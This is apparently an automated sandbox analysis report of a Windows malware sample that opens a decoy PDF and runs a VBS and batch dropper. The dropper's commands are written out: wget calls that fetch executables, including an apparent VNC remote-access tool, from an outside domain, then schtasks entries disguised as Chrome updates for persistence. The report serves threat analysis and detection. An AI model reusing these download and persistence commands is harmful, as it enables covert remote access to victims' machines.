9f651ae6ea538238748614a7f86fe2b0f76e881d6c38da581f284e4b6f79b0ca

Analysis

max time kernel
119s
max time network
159s
platform
windows10_x64
resource
win10-en-20211208
submitted
28-01-2022 13:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01/2015.5.27/14.exe
Size

821KB
MD5

9ed9cb3fdd2a68a25665681a94879771
SHA1

ad957a4aca28e4ab343cd8151e9e218b39e3f595
SHA256

05a5bad78cdb97a78ca13bf4afa525a5294dbc9e6babb41a0861d48e76d64bcb
SHA512

15941df8d2dfb085e7604c3e94d4346cb59e240700dd06ceabe28d57cd471dc50ccb7448d5b9a3ac6b2642a3a09367d14819214c915ce4c069a476c43b7da223

Score

8^/10

upx

Malware Config

Signatures

Executes dropped EXE 4 IoCs

Processes:

getcrome.exewget.exewget.exewget.exe

pid process

4588 getcrome.exe
1300 wget.exe
4252 wget.exe
4204 wget.exe

pid	process
4588	getcrome.exe
1300	wget.exe
4252	wget.exe
4204	wget.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx
C:\Users\Admin\AppData\Local\Temp\wget.exe	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

5104 schtasks.exe
4792 schtasks.exe
2144 schtasks.exe

pid	process
5104	schtasks.exe
4792	schtasks.exe
2144	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

Processes:

14.exegetcrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	14.exe
Key created	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings	getcrome.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3164 PING.EXE

pid	process
3164	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

Processes:

wget.exewget.exewget.exeAcroRd32.exe

pid	process
1300	wget.exe
1300	wget.exe
4252	wget.exe
4252	wget.exe
4204	wget.exe
4204	wget.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

AcroRd32.exe

pid process

4628 AcroRd32.exe
4628 AcroRd32.exe
4628 AcroRd32.exe
4628 AcroRd32.exe
4628 AcroRd32.exe
4628 AcroRd32.exe

pid	process
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe
4628	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

14.exegetcrome.exeWScript.execmd.exeAcroRd32.exeRdrCEF.exe

description	pid	process	target process
PID 2616 wrote to memory of 4628	2616	14.exe	AcroRd32.exe
PID 2616 wrote to memory of 4628	2616	14.exe	AcroRd32.exe
PID 2616 wrote to memory of 4628	2616	14.exe	AcroRd32.exe
PID 2616 wrote to memory of 4588	2616	14.exe	getcrome.exe
PID 2616 wrote to memory of 4588	2616	14.exe	getcrome.exe
PID 2616 wrote to memory of 4588	2616	14.exe	getcrome.exe
PID 4588 wrote to memory of 1620	4588	getcrome.exe	WScript.exe
PID 4588 wrote to memory of 1620	4588	getcrome.exe	WScript.exe
PID 4588 wrote to memory of 1620	4588	getcrome.exe	WScript.exe
PID 1620 wrote to memory of 4968	1620	WScript.exe	cmd.exe
PID 1620 wrote to memory of 4968	1620	WScript.exe	cmd.exe
PID 1620 wrote to memory of 4968	1620	WScript.exe	cmd.exe
PID 4968 wrote to memory of 5068	4968	cmd.exe	chcp.com
PID 4968 wrote to memory of 5068	4968	cmd.exe	chcp.com
PID 4968 wrote to memory of 5068	4968	cmd.exe	chcp.com
PID 4968 wrote to memory of 1300	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 1300	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 1300	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 4252	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 4252	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 4252	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 4204	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 4204	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 4204	4968	cmd.exe	wget.exe
PID 4968 wrote to memory of 2340	4968	cmd.exe	cmd.exe
PID 4968 wrote to memory of 2340	4968	cmd.exe	cmd.exe
PID 4968 wrote to memory of 2340	4968	cmd.exe	cmd.exe
PID 4968 wrote to memory of 2980	4968	cmd.exe	find.exe
PID 4968 wrote to memory of 2980	4968	cmd.exe	find.exe
PID 4968 wrote to memory of 2980	4968	cmd.exe	find.exe
PID 4968 wrote to memory of 5100	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5100	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5100	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5104	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5104	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5104	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5076	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5076	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 5076	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 4792	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 4792	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 4792	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 4760	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 4760	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 4760	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 2144	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 2144	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 2144	4968	cmd.exe	schtasks.exe
PID 4968 wrote to memory of 3164	4968	cmd.exe	PING.EXE
PID 4968 wrote to memory of 3164	4968	cmd.exe	PING.EXE
PID 4968 wrote to memory of 3164	4968	cmd.exe	PING.EXE
PID 4628 wrote to memory of 4100	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 4100	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 4100	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 4872	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 4872	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 4872	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 720	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 720	4628	AcroRd32.exe	RdrCEF.exe
PID 4628 wrote to memory of 720	4628	AcroRd32.exe	RdrCEF.exe
PID 720 wrote to memory of 2452	720	RdrCEF.exe	RdrCEF.exe
PID 720 wrote to memory of 2452	720	RdrCEF.exe	RdrCEF.exe
PID 720 wrote to memory of 2452	720	RdrCEF.exe	RdrCEF.exe
PID 720 wrote to memory of 2452	720	RdrCEF.exe	RdrCEF.exe

C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe
"C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2616

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\spisok.pdf"
2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4628

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
3⤵
PID:4100

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
3⤵
PID:4872

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
3⤵
- Suspicious use of WriteProcessMemory
PID:720

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AAA8491B831F694F647A4A0BBC4B699A --mojo-platform-channel-handle=1660 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:2452

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0430AEDE0A7C4496FD9B34936C1E242F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0430AEDE0A7C4496FD9B34936C1E242F --renderer-client-id=2 --mojo-platform-channel-handle=1676 --allow-no-sandbox-job /prefetch:1
4⤵
PID:1136

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F594B7979BFBCDED06ABD4BCAD1E2CC3 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:3084

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2424DB021AEF746707CA1949D05D66B --mojo-platform-channel-handle=2044 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:3596

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=02B81E92D8A1815D520C3FA934D448CC --mojo-platform-channel-handle=2364 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
4⤵
PID:2388

C:\Users\Admin\AppData\Local\Temp\getcrome.exe
"C:\Users\Admin\AppData\Local\Temp\getcrome.exe" -p000_
2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4588

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getchrome.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c getchrome.cmd
4⤵
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\SysWOW64\chcp.com
chcp 1251
5⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\wget.exe
wget.exe http://xiaomi-mi.com.ua/images/logo/chrome-xvnc-v5517.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1300

C:\Users\Admin\AppData\Local\Temp\wget.exe
wget.exe http://xiaomi-mi.com.ua/images/logo/chromeupdates.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4252

C:\Users\Admin\AppData\Local\Temp\wget.exe
wget.exe http://xiaomi-mi.com.ua/images/logo/updatesexplorer.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ver "
5⤵
PID:2340

C:\Windows\SysWOW64\find.exe
find "Microsoft Windows XP"
5⤵
PID:2980

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn ChromeUpdates_vnc /f
5⤵
PID:5100

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn ChromeUpdates_vnc /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chrome-xvnc-v5517.exe /SC MINUTE /mo 240
5⤵
- Creates scheduled task(s)
PID:5104

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn ChromeUpdates_ups /f
5⤵
PID:5076

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn ChromeUpdates_ups /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chromeupdates.exe /SC MINUTE /mo 60
5⤵
- Creates scheduled task(s)
PID:4792

C:\Windows\SysWOW64\schtasks.exe
schtasks /Delete /tn ChromeUpdates_exp /f
5⤵
PID:4760

C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /tn ChromeUpdates_exp /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\updatesexplorer.exe /SC MINUTE /mo 10
5⤵
- Creates scheduled task(s)
PID:2144

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
5⤵
- Runs ping.exe
PID:3164

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\getchrome.cmd
MD5
93c67990434454377a2eb13bcafd9a3e

SHA1
2d17bf5310bf73c7a7375c90877f5def35839fb6

SHA256
87ae0c2981e35ba3fc0a00e9c6bf8cc57135c99dae06228212349859b0e82912

SHA512
b3a3bd331827d1b0f0a1fc4619a935107405f0aad47e336d176d24f5245874ae7bd6f2d53555e9558a89f17e6223c59f0b4a0068476d39d30eccedffa52142cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\getchrome.vbs
MD5
97d6fbd4523605f4d2fd15c1a77d08d5

SHA1
968e82657e1f72a4b8b357600e9f4e0d4270be06

SHA256
a59e6b709804144908e1be82293d9565a08a035502cfbc84048d1e248c1e9a3d

SHA512
16468adb77a98bf6c14596e3570661254e568c4586bb0058ac51f7fffb5f75ab28eb50e54e1473b8e616d6f4e50015765a780b6a95a2d00c800be81e46a339e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\getcrome.exe
MD5
90f8f8ea411d767d833f9697dd0dabf4

SHA1
07b81a40c08989a06dff1c0ac4f1b295b7ae5fce

SHA256
c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df

SHA512
ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\getcrome.exe
MD5
90f8f8ea411d767d833f9697dd0dabf4

SHA1
07b81a40c08989a06dff1c0ac4f1b295b7ae5fce

SHA256
c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df

SHA512
ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\spisok.pdf
MD5
9a089260643dbb76ef4a0b26aa609362

SHA1
d2f74a2ce15993b37e6f9c8a827d5dc9f3e0ddfb

SHA256
3c26b7b0ca159004a80183083f778a4ddd52a8e985b9f6a38998a9bda45c4412

SHA512
a78f42e2a70178c8361b6e8c25e5844d350df0e8f7ba734e4f113c6934952eb49f340af62baa4356a0de5a8780313110f94009723837102b5ad9004c06a69628

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe
MD5
bd126a7b59d5d1f97ba89a3e71425731

SHA1
457b1cd985ed07baffd8c66ff40e9c1b6da93753

SHA256
a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599

SHA512
3ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a

Download Submit
memory/1136-217-0x0000000077E12000-0x0000000077E13000-memory.dmp

Filesize
4KB

Download
memory/2388-228-0x0000000077E12000-0x0000000077E13000-memory.dmp

Filesize
4KB

Download
memory/2452-214-0x0000000077E12000-0x0000000077E13000-memory.dmp

Filesize
4KB

Download
memory/3084-222-0x0000000077E12000-0x0000000077E13000-memory.dmp

Filesize
4KB

Download
memory/3596-225-0x0000000077E12000-0x0000000077E13000-memory.dmp

Filesize
4KB

Download